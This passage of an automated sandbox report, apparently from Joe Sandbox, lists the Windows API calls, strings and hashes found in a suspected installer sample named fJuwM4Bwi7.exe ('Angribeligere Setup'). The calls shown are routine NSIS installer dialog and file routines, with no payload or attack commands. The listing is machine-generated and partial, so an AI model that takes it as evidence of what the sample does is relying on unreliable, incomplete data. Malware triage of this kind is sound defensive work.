                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A7D
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A8F
                                        • DeleteObject.GDI32(00000000), ref: 00404A92
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404ABD
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404AC9
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5E
                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B89
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B9D
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404BCC
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404BDA
                                        • ShowWindow.USER32(?,00000005), ref: 00404BEB
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CE8
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D4D
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D62
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D86
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DA6
                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404DBB
                                        • GlobalFree.KERNEL32(00000000), ref: 00404DCB
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E44
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404EED
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EFC
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F1C
                                        • ShowWindow.USER32(?,00000000), ref: 00404F6A
                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F75
                                        • ShowWindow.USER32(00000000), ref: 00404F7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N$wi
                                        • API String ID: 1638840714-531399164
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404479
                                        • SetWindowTextA.USER32(00000000,?), ref: 004044A3
                                        • SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
                                        • CoTaskMemFree.OLE32(00000000), ref: 0040455F
                                        • lstrcmpiA.KERNEL32(Call,Angribeligere Setup: Installing), ref: 00404591
                                        • lstrcatA.KERNEL32(?,Call), ref: 0040459D
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF
                                          • Part of subcall function 0040552E: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 00405541
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 00405FF9
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                          • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040600B
                                          • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040601B
                                        • GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466C
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404687
                                          • Part of subcall function 004047E0: lstrlenA.KERNEL32(Angribeligere Setup: Installing,Angribeligere Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                                          • Part of subcall function 004047E0: wsprintfA.USER32 ref: 00404886
                                          • Part of subcall function 004047E0: SetDlgItemTextA.USER32(?,Angribeligere Setup: Installing), ref: 00404899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$Angribeligere Setup: Installing$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$Call$wi
                                        • API String ID: 2624150263-1536733886
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
                                        • GetSysColor.USER32(?), ref: 00404203
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
                                        • lstrlenA.KERNEL32(?), ref: 00404224
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
                                        • GetDlgItem.USER32(?,0000040A), ref: 004042AA
                                        • SendMessageA.USER32(00000000), ref: 004042AD
                                        • GetDlgItem.USER32(?,000003E8), ref: 004042D8
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00404327
                                        • SetCursor.USER32(00000000), ref: 00404330
                                        • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00404350
                                        • SetCursor.USER32(00000000), ref: 00404353
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404393
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                        • String ID: Call$N$open$wi
                                        • API String ID: 3615053054-204474362
                                        APIs
                                        • lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405C12,?,?,00000001,004057B5,?,00000000,000000F1,?), ref: 00405A7E
                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405C12,?,?,00000001,004057B5,?,00000000,000000F1,?), ref: 00405AA2
                                        • GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405AAB
                                          • Part of subcall function 0040592C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                                          • Part of subcall function 0040592C: lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                                        • GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405AC8
                                        • wsprintfA.USER32 ref: 00405AE6
                                        • GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,00000004,00421E88,?,?,?,?,?), ref: 00405B21
                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B30
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B68
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BBE
                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405BD0
                                        • GlobalFree.KERNEL32(00000000), ref: 00405BD7
                                        • CloseHandle.KERNEL32(00000000), ref: 00405BDE
                                          • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 004059CB
                                          • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                        • String ID: %s=%s$NUL$[Rename]
                                        • API String ID: 1265525490-4148678300
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        APIs
                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 00405FF9
                                        • CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\fJuwM4Bwi7.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040600B
                                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 0040601B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-2951792297
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 00404070
                                        • GetSysColor.USER32(00000000), ref: 0040408C
                                        • SetTextColor.GDI32(?,00000000), ref: 00404098
                                        • SetBkMode.GDI32(?,?), ref: 004040A4
                                        • GetSysColor.USER32(?), ref: 004040B7
                                        • SetBkColor.GDI32(?,?), ref: 004040C7
                                        • DeleteObject.GDI32(?), ref: 004040E1
                                        • CreateBrushIndirect.GDI32(?), ref: 004040EB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                          • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                        • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000005.00000002.79058630911.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000005.00000002.79058691430.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000005.00000002.79058724593.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                        • String ID:
                                        • API String ID: 3730416702-0
                                        APIs
                                          • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                        • GlobalFree.KERNEL32(?), ref: 100024B9
                                        • GlobalFree.KERNEL32(00000000), ref: 100024F3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_10000000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                        • GlobalFree.KERNEL32(?), ref: 0040272C
                                        • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                        • GlobalFree.KERNEL32(00000000), ref: 00402745
                                        • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                        • String ID:
                                        • API String ID: 3294113728-0
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                        • GetTickCount.KERNEL32 ref: 00402C10
                                        • wsprintfA.USER32 ref: 00402C3E
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                          • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                          • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                          • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll), ref: 0040508D
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                          • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                          • Part of subcall function 00402BBE: MulDiv.KERNEL32(00000000,00000064,00000257), ref: 00402BD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.79053606762.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053688051.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053727810.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000005.00000002.79053932829.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 722711167-2449383134
                                        • Opcode ID: a5c26afaddfd3aecbd3c11435c5afe696aa269bce338e105ebc0525db4289807
                                        • Instruction ID: 53b2eec8c243fd5a5b591a6d8e7090b5e500d3da6e0592f5c5af2241ed808ea0
                                        • Opcode Fuzzy Hash: a5c26afaddfd3aecbd3c11435c5afe696aa269bce338e105ebc0525db4289807
                                        • Instruction Fuzzy Hash: AB0188B0949614ABDB216F64AE4DE9F7B7CFB017057148037FA01B11E1C6B8D541CBAE
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404905
                                        • GetMessagePos.USER32 ref: 0040490D
                                        • ScreenToClient.USER32(?,?), ref: 00404927
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404939
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040495F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                        • Instruction ID: 7baaa9b85802c8a5173365c44ed2834cc31749f5d024e9fb4d2ec5e64c2f69ce
                                        • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                        • Instruction Fuzzy Hash: E40140B1D00218BADB01DBA4DC85FFFBBBCAB95721F10412BBA10B61D0C7B469018BA5
                                        APIs
                                        • GetDC.USER32(?), ref: 00401D29
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                        • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                        • CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID: Times New Roman
                                        • API String ID: 3808545654-927190056
                                        • Opcode ID: d8f1134e0d9cc842e71cdb0a798ee728ace2ac96abc312f9551e68033e09961b
                                        • Instruction ID: b452d76144ce78c1ea2c31cbd89393ff29a213aa8dcca448cc35c7c7cb6754f7
                                        • Opcode Fuzzy Hash: d8f1134e0d9cc842e71cdb0a798ee728ace2ac96abc312f9551e68033e09961b
                                        • Instruction Fuzzy Hash: F8011271948340AFE701DBB0AE0EB9A7F74EB19705F108535F141B72E2C6B954159B2F
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                        • wsprintfA.USER32 ref: 00402B91
                                        • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                        • API String ID: 1451636040-1158693248
                                        • Opcode ID: bccffcf18056edd42c20cb723d80919439a72dcdb3cc8cc3de12e394d3f134cc
                                        • Instruction ID: 4b4d840d1cf11f9656568dd8641bec75cd76f4f3bd4f461a87d93eb2d0bf3f96
                                        • Opcode Fuzzy Hash: bccffcf18056edd42c20cb723d80919439a72dcdb3cc8cc3de12e394d3f134cc
                                        • Instruction Fuzzy Hash: F7F01D70900208BBEF215F61DD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A
                                        APIs
                                        • lstrlenA.KERNEL32(Angribeligere Setup: Installing,Angribeligere Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                                        • wsprintfA.USER32 ref: 00404886
                                        • SetDlgItemTextA.USER32(?,Angribeligere Setup: Installing), ref: 00404899
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s$Angribeligere Setup: Installing
                                        • API String ID: 3540041739-3982710442
                                        • Opcode ID: 01753190a1a61c127577f13d1343217740e1c978151e7be2dc7a3714e54fef7e
                                        • Instruction ID: 8631c14a921e8479d2aaee063571767324bc63c1cfe9171b6f21c1c007081b9c
                                        • Opcode Fuzzy Hash: 01753190a1a61c127577f13d1343217740e1c978151e7be2dc7a3714e54fef7e
                                        • Instruction Fuzzy Hash: 90112433A441283BDB0065AD9C49EAF328CDF81334F244637FA25F61D1E9788C1292E8
                                        APIs
                                        • SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: TextWindow
                                        • String ID: "C:\Users\user\Desktop\fJuwM4Bwi7.exe"$1033$Angribeligere Setup: Installing$wi
                                        • API String ID: 530164218-3597290920
                                        • Opcode ID: 19cfd19e0caeefaef38e1447d84035fc52b25a49d1c0675f2d636fa1eca01dcb
                                        • Instruction ID: 694a286dd4981efc18ef326c294584d4bec2a1602357d8abc11fec8a6f834ca0
                                        • Opcode Fuzzy Hash: 19cfd19e0caeefaef38e1447d84035fc52b25a49d1c0675f2d636fa1eca01dcb
                                        • Instruction Fuzzy Hash: EC11D4B1B046109BCB24DF15DC809337BBDEB8471A329813BE941A73A1C73D9E029A98
                                        APIs
                                        • GetDlgItem.USER32(?), ref: 00401CD0
                                        • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                        • DeleteObject.GDI32(00000000), ref: 00401D1B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
                                        • Instruction ID: 68903ef9478fc0d920f95a79cd5396482650d24808bb52901199de5d2149753e
                                        • Opcode Fuzzy Hash: 729fc4278e862243959d7ad856f7c73244b6852cfe4ffc3fdd7b269795ac9902
                                        • Instruction Fuzzy Hash: 06F062B2A05114BFD701DBA4EE88CAF77BCEB44301B008576F501F2091C7389D019B79
                                        APIs
                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 004057CC
                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77463410,004033C9), ref: 004057D5
                                        • lstrcatA.KERNEL32(?,00409014), ref: 004057E6
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004057C6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-787714339
                                        • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                        • Instruction ID: c144259923a6e848a034fe90771ae4f3275bad2fdba58d127270a3e6eafdfb33
                                        • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                        • Instruction Fuzzy Hash: 00D0A962606A306BD20222168C09E8F6A08CF06300B044033F204B62B2C63C0D418FFE
                                        APIs
                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
